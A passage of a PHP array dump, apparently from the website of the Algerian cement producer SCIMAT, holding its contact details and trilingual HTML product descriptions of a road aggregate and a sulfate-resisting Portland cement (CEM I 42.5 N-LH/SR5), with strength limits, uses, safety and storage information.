'adresse_fr' => '73 Bis, Rue Benflis, la Verdure, Batna 05000',
'adresse_ara' => '73 Bis, Rue Benflis, la Verdure, Batna 05000',
'adresse_en' => '73 Bis, Rue Benflis, la Verdure, Batna 05000',
'map' => ' 35.5575, 6.1730',
'fax' => '+(213) 33 85 11 01',
'tel1' => '033 85 13 00/ 26 72',
'tel2' => '',
'tel3' => '',
'mob1' => '',
'mob2' => '',
'mob3' => '',
'date_ajout' => '2021-01-30'
)
)
$produit_desc2 = array(
(int) 0 => array(
'Produit' => array(
'id' => '878836',
'nom_fr' => 'Tout Venant Confondu -TVC- 0/31.5 mm',
'nom_ara' => 'Tout Venant Confondu -TVC- 0/31.5 mm',
'nom_en' => 'Tout Venant Confondu -TVC- 0/31.5 mm',
'sous_nom_fr' => '',
'sous_nom_ara' => '',
'sous_nom_en' => '',
'date_ajout' => '2021-01-26',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le<strong> Tout Venant Confondu -TVC- 0/31.5 mm </strong> est un mélange de Granulats de toutes dimensions. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisation</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le<strong> Tout Venant Confondu -TVC- 0/31.5 mm</strong> est utilisé dans les :</span></span></p>
<ul>
<li><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Assises de Chaussées (Couche de Base)</strong></span></span></li>
</ul>
<p style="margin-left:36pt"> </p>
<p> </p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">إن <strong>Tout Venant Confondu -TVC- 0/31.5 mm</strong> عبارة عن مزيج من الركام من جميع الأحجام.</span></span></small></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#008000"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>مجال الاستعمال</u> :</strong></span></span></small></span></p>
<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يتم استخدام <strong>Tout Venant Confondu -TVC- 0/31.5 mm</strong> في:</span></span></small></p>
<ul dir="rtl">
<li style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الطبقات الأرضية (الطبقة الأساسية)</strong></span></span></small></li>
</ul>
',
'contenu_en' => '<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Tout Venant Confondu -TVC- 0/31.5 mm</strong> is a mixture of aggregates of all sizes.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Use</strong></u></span><strong><span style="color:#008000"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Tout Venant Confondu -TVC- 0/31.5 mm</strong> is used in:</span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Ground Layers (Base Layer)</strong></span></span></li>
</ul>
',
'img_prd' => 'produit-1611671534.png',
'img_prd_detail' => '',
'Code_Pr' => '0',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611671534.pdf',
'pos_slider' => '2'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 1 => array(
'Produit' => array(
'id' => '89963',
'nom_fr' => 'GICA MOUDHAD ',
'nom_ara' => 'جيكا مضاد',
'nom_en' => 'GICA MOUDHAD',
'sous_nom_fr' => 'CEM I 42.5 N-LH/SR5',
'sous_nom_ara' => 'CEM I 42.5 N-LH/SR5',
'sous_nom_en' => 'CEM I 42.5 N-LH/SR5',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Composition</strong></u><strong> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:black">Le <strong>Ciment CEM I/42.5 N-LH/SR5 -NA 442/2013</strong>- </span> est un Ciment Portland résultant du broyage de clinker et de sulfate de calcium (gypse ou anhydrite) pour régulariser la prise, et éventuellement de constituants secondaires en faible quantité inférieure à 5 %. La teneur en clinker est au minimum de 95 %.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:#008000"><u>Valeurs limites</u> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">En plus des valeurs caractéristiques des classes de résistance, la Norme prévoit le respect de valeurs limites de résistance à la compression applicables à chaque résultat d’essai. Ces résistances sont mesurées sur «mortier normal» selon la <strong>Norme NA 442-2013 </strong>inspirée de la <strong>Norme Européenne NF EN 196-1</strong>.</span></span></p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong>Valeur Limite de Résistance à la Compression pour CEM I/42.5 N-LH/SR5</strong></span></span></span></p>
<table align="center" border="1" cellpadding="0" cellspacing="0" style="height:339px; width:420px">
<tbody>
<tr>
<td style="height:104px; width:117px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Classe de Résistance</strong></span></span></p>
</td>
<td style="height:104px; width:145px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite de la Résistance selon la Norme NA 442</strong></span></span></p>
</td>
<td style="height:104px; width:123px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite Inférieure Spécifiée de notre Ciment</strong></span></span></p>
</td>
<td style="height:104px; width:139px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite Supérieure Spécifiée de notre Ciment</strong></span></span></p>
</td>
</tr>
<tr>
<td style="height:29px; width:117px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>02 jours</strong></span></span></p>
</td>
<td style="height:29px; width:145px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>≥ 10,0</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:29px; width:123px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">21,36</span> </strong></span></span></p>
</td>
<td style="height:29px; width:139px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">27,71</span></strong></span></span></p>
</td>
</tr>
<tr>
<td style="height:48px; width:117px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>28 jours</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:48px; width:145px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">62.5≤res≥42,5</span> </strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:48px; width:123px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">44,82</span> </strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:48px; text-align:center; width:139px">
<p> </p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>54,53</strong></span></span></p>
<p> </p>
</td>
</tr>
</tbody>
</table>
<div style="page-break-after: always"><span style="display:none"> </span></div>
<p> </p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Les propriétés chimiques, qui sont un facteur important de la résistance des bétons à des ambiances agressives, concernent la teneur en anhydride sulfurique (SO3) inférieure à 3.0 % (3,5 % pour les classes 42,5 R et 52,5) et en ions chlorure inférieure à 0,10 %.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Contrôle de la Qualité</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT fabrique et commercialise des Ciments de <strong>Qualité </strong>conformément aux Normes Algériennes en vigueur. Ils sont contrôlés périodiquement par le Centre d’Études et de Services Technologiques de l’Industrie des Matériaux de Construction -CETIM-(accrédité selon le Référentiel ISO 17025). </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:#008000"><u>Principaux domaines d’emploi</u> </span><span style="color:green">:</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Ciment CEM I / 42.5 N-LH/SR5 </strong>convient pour le béton<a href="https://www.infociments.fr/glossaire/beton-arme" title="Béton armé"> </a>armé ou le béton précontraint, en revanche leurs caractéristiques mécaniques n’en justifient généralement pas l’emploi pour les travaux de maçonnerie courante et les bétons en grande masse ou faiblement armés.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Ciment CEM I / 42.5 N-LH/SR5</strong> permet un décoffrage rapide appréciable notamment en préfabrication. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour les travaux en milieu agressif, eaux de mer ou eaux sulfatées, on emploiera respectivement le Ciment Portland <strong>CEM I 42.5 N-LH/SR5 </strong>pour travaux à la mer PM, ou pour travaux en eaux à haute teneur en sulfates ES.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u><span style="color:#008000">Précautions particulières</span></u><span style="color:green"> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour les ouvrages massifs, on évitera l’utilisation du <strong>Ciment CEM I 42.5 N-LH/SR5 </strong>dont la chaleur d’hydratation risque de conduire à une élévation de température excessive lors de leur réalisation.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations Spécifiques et Générales</u> :</strong></span></span></span></p>
<ul>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des granulats propres, exempts de matières organiques;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Respecter les dosages et les règles de l’art pour la mise en œuvre;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Viser un rapport Eau/Ciment de préférence le plus faible possible, compatible avec une bonne rhéologie du béton frais;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des adjuvants normalisés;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Éviter une dessiccation précoce par temps chaud ou venteux en réalisant une cure du béton (arrosage, bâche humide, produits de cure…);</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Adapter la vibration du béton à sa consistance pour obtenir une compacité optimale sans ségrégation;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Éviter tout contact avec la peau et les yeux;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des équipements adaptés : gants, chaussures imperméables, lunettes…</span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#FF0000"><u><strong>Sécurité</strong></u> :<strong> </strong></span></span></span></p>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT vise à être l'employeur le plus sûr de la Société par l’amélioration des conditions de travail pour éviter toutes blessures corporelles et répercussions sanitaires liées à ses activités.</span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><span style="color:#008000"><strong>Mesures de Protection</strong></span></u><span style="color:#008000"><strong> :</strong></span></span></span></p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Mélanger à l'eau, le Ciment est irritant; </span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Éviter le contact avec les yeux et la peau;</span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Laver immédiatement et abondamment à l'eau toute zone exposée; </span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">En cas de contact avec les yeux, consulter impérativement un médecin. </span></span></span></p>
</li>
</ul>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour plus de détails,Veuillez- vous reporter à la Fiche de Données de Sécurité détaillée.</span></span></span></p>
<div class="source_url_spacer">
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Environnement</strong></u><strong> :</strong></span></span></span></p>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT vise à être en permanence un exemple de la responsabilité écologique de la Société par la protection de l’environnement, y compris la prévention de la pollution et l’utilisation de ressources durables et ce par<em> </em> :</span></span></span></p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La préservation des ressources naturelles;</span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La réduction des rejets atmosphériques;</span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La maitrise de la gestion des déchets. </span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"> <u><strong>Stockage</strong></u><strong> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le Ciment doit être stocké au sec et protégé de l'humidité. </span> <span style="color:#008000"><strong> </strong></span></span></span></p>
<p><span style="color:#40E0D0"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Conditionnement</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le </span><strong>Ciment CEM I 42.5 N-LH/SR5</strong><span style="color:#000000"> est livré en vrac et en sacs de 50 kg.</span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u><span style="color:#000080">Certification</span></u><span style="color:#000000"> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le </span><strong>Ciment CEM I 42.5 N-LH/SR5 </strong><span style="color:#000000"> est certifié selon la <strong>Norme Algérienne 442/2013 </strong>à la Marque de Conformité Nationale <strong>TEDJ</strong> délivrée par l’Institut Algérien de Normalisation -IANOR-.</span></span></span></p>
</div>
',
'contenu_ara' => '<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>التركيبة :</strong></u></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> </strong></span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>CEM I / 42.5 N-LH/SR5</strong> هو اسمنت بورتلاند ناتج عن طحن الكلنكر وكبريتات الكالسيوم (الجبس أو الأنهيدريت) لتنظيم الإعداد ، وربما المكونات الثانوية بكميات صغيرة بنسبة 5٪. محتوى الكلنكر 95٪ على الأقل.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>القيم الحدية</strong></u></span></span></span> <span style="color:#008000"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> :</span></span></strong></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">بالإضافة إلى القيم المميزة لفئات القوة ، توفر المواصفة القياسية الامتثال لقيم حد مقاومة الانضغاط المطبقة على كل نتيجة اختبار. يتم قياس هذه المقاومة على "ملاط عادي" وفقًا للمعيار <strong>NA 442-2013</strong> المستوحى من المعيار الأوروبي <strong>NF EN</strong> <strong>196-1</strong>.</span></span></p>
<p dir="rtl" style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong>قيمة حد مقاومة الضغط لـ</strong> </span></span></span><span style="color:#008000"><strong><span style="font-family:georgia,serif; font-size:12.0pt">CEM I / 42.5 N-LH/SR5</span></strong></span></p>
<table align="center" border="1" cellpadding="0" cellspacing="0" dir="rtl">
<thead>
<tr>
<th scope="col" style="height:104px; width:117px">
<p style="text-align:center"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>فئة المقاومة</strong></span></span></small></p>
</th>
<th scope="col" style="height:104px; width:145px">
<p style="text-align:center"> </p>
<p style="text-align:center"><strong><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">حد القوة وفقًا للمعيار<br />
NA 442</span></span></small></strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong> </strong></span></span></p>
<p style="text-align:center"> </p>
</th>
<th scope="col" style="height:104px; width:123px">
<p dir="rtl" style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>الحد الأدنى المحدد </strong></span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>لاسمنت SCIMAT</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong> </strong></span></span></p>
</th>
<th scope="col" style="height:104px; width:139px">
<p style="text-align:center"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الحد الأعلى<br />
المحدد لاسمنت SCIMAT</strong></span></span></small></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td style="height:30px; text-align:center; width:117px">
<p><strong>يومان</strong></p>
</td>
<td style="height:30px; text-align:center; width:145px">
<p><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> 10 </span></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:black">≤</span></span></span></strong></p>
</td>
<td dir="ltr" style="height:30px; text-align:center; width:123px">
<p><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:black">21,36</span></span></span></strong></p>
</td>
<td style="height:30px; text-align:center; width:139px"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong><span style="color:black">27,71</span></strong></span></span></td>
</tr>
<tr>
<td style="height:30px; text-align:center; width:117px">
<p><span style="font-size:16px"><strong>28 يوم</strong></span></p>
</td>
<td style="height:30px; text-align:center; width:145px">
<p><strong><span style="font-family:times new roman,times,serif"><span style="font-size:14px"><span style="color:black">42,5 ≤ <span dir="ltr" lang="fr">res</span>≥62,5</span></span></span></strong></p>
</td>
<td style="height:30px; text-align:center; width:123px"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:black">44,82 </span></span></span></strong></td>
<td style="height:30px; text-align:center; width:139px"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">54,53</span></span></strong></td>
</tr>
</tbody>
</table>
<div style="clear:both;">
<div style="clear:both;"> </div>
<div style="clear:both;">
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">الخصائص الكيميائية ، التي تعتبر عاملاً مهماً في مقاومة الخرسانة للبيئات العدوانية ، تتعلق بمحتوى أنهيدريد الكبريت (SO3) الذي يقل عن 3.0٪ (3.5٪ للفئتين 42.5 R و 52.5) وفي أيونات الكلوريد الأقل من 0.10 ٪.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>رقابة الجودة</strong></u><strong> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تقوم SCIMAT بان<span style="color:#000000">ت</span>اج وتسويق الأسمنت عالي <strong>الجودة</strong> وفقًا للمعايير الجزائرية المعمول بها. يتم فحصها بشكل دوري من قبل مركز الدراسات والخدمات ا<span style="color:#000000">لتكنولوجية </span>لصناعة مواد البناء -CETIM-(المعتمد وفقًا لمعيار ISO 17025).</span></span></p>
<p dir="rtl" style="text-align:justify"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><strong><u>مجالات الاستعمال</u></strong></span><span style="color:#008000"><strong><u> الرئيسية</u> :</strong></span></span></span></small></p>
<p dir="rtl" style="text-align:justify"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong> <strong>CEM I / 42.5 N-LH / SR5</strong> مناسب للخرسانة المسلحة أو الخرسانة </span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">سابقة الإجهاد ، من ناحية أخرى فإن خصائصها الميكانيكية لا تبرر بشكل عام استخدامها لأعمال البناء العادية والخرسانة في كتلة كبيرة أو مقواة بشكل ضعيف.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يسمح </span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>CEM I / 42.5 N-LH/SR5</strong> بتقشير سريع ملموس ، خاصة في التصنيع المسبق. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">للعمل في بيئة عدوانية أو مياه البحر أو المياه الكبريتية ، سيتم استخدام أسمنت بورتلاند <strong>CEM I 42.5 N-LH / SR5</strong> على التوالي للعمل في البحر مساءً ، أو للعمل في الماء الذي يحتوي على نسبة عالية من الكبريتات.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="color:#008000"><u><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif">إحتياطات خاصة</span></span></strong></u><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> : </span></span></strong></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">بالنسبة للهياكل الضخمة ، تجنب استخدام <strong> </strong></span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>CEM I / 42.5 N-LH/SR5</strong> ، حيث قد تؤدي حرارة الماء إلى ارتفاع مفرط في درجة الحرارة أثناء بنائها.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>توصيات محددة وعامة</strong></u><strong> :</strong></span></span></span></p>
<ul dir="rtl">
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدام ركام نظيف وخالي من المواد العضوية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> احترام الجرعات وقواعد فن التنفيذ ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تهدف إلى نسبة الماء / الأسمنت ، ويفضل أن تكون منخفضة قدر الإمكان ، ومتوافقة مع الانسيابية الجيدة للخرسانة الطازجة ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدام مواد مساعدة معيارية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب الجفاف المبكر في الطقس الحار أو العاصف عن طريق معالجة الخرسانة (الري ، القماش المشمع الرطب ، منتجات المعالجة ، إلخ) ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تكييف اهتزازات الخرسانة مع قوامها للحصول على تماسك أمثل بدون فصل ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب ملامسة الجلد والعينين ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدم المعدات المناسبة: القفازات ، والأحذية المقاومة للماء ، والنظارات ، وما إلى ذلك.</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="color:#FF0000"><u><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">الحماية</span></span></strong></u><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> :</span></span></strong></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تهدف SCIMAT إلى أن تكون الشركة الأكثر أمانًا في المجتمع من خلال تحسين ظروف العمل لتجنب أي إصابات جسدية وتداعيات صحية مرتبطة بأنشطتها</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>تدابير وقائية</strong></u><strong> :</strong></span></span></span></p>
<ul dir="rtl">
<li style="text-align:left">
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> يخلط مع الماء ، والأسمنت مزعج.</span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب ملامسة العينين والجلد؛</span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> اغسل جميع المناطق المكشوفة على الفور بكمية كبيرة من الماء ؛</span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> في حالة ملامسة العين لا بد من استشارة الطبيب.</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">لمزيد من التفاصيل ، يرجى الرجوع إلى ورقة بيانات السلامة التفصيلية. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>البيئة</strong></u><strong> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تهدف SCIMAT إلى أن تكون بشكل دائم مثالاً للمسؤولية البيئية للمجتمع من خلال حماية البيئة ، بما في ذلك منع التلوث واستخدام الموارد المستدامة من خلال :</span></span></p>
<ul dir="rtl">
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> الحفاظ على الموارد الطبيعية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> الحد من انبعاثات الغلاف الجوي ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> التمكن من إدارة النفايات</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong><u>التخزين</u> : </strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يجب تخزين الأسمنت في مكان جاف وحمايته من الرطوبة</span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong></strong></span></span></span><br />
</p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#40E0D0"><u><strong>التكييف</strong></u><strong> : </strong></span><span style="color:#008000"><strong> </strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يتم تسليم </span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>CEM I / 42.5 N-LH/SR5</strong></span></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> سائبًا وفي أكياس سعة 50 كجم. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#000080"><strong> <u>الشهادة</u> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">تم اعتماد <strong>الاسمنت</strong> <strong>CEM I / 42.5 N-LH/SR5</strong> وفقًا للمعيار الجزائري <strong>2013/442</strong> مع علامة المطابقة الوطنية <strong>TEDJ</strong> الصادرة عن المعهد الجزائري للتقييس</span></span></p>
</div>
</div>
',
'contenu_en' => '<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Composition</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>The Cement CEM I / 42.5 N-LH / SR5 -NA 442 / 2013</strong>- is a Portland Cement resulting from the grinding of clinker and calcium sulphate (gypsum or anhydrite) to regulate the setting, and possibly secondary constituents in small quantities at 5 %. The clinker content is at least 95%.</span></span></p>
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><strong>Compressive strength limit value for CEM I 42.5N SR 5</strong></span></span></span></p>
<div style="clear:both;">
<table align="center" border="1" cellpadding="0" cellspacing="0" style="height:370px; width:425px">
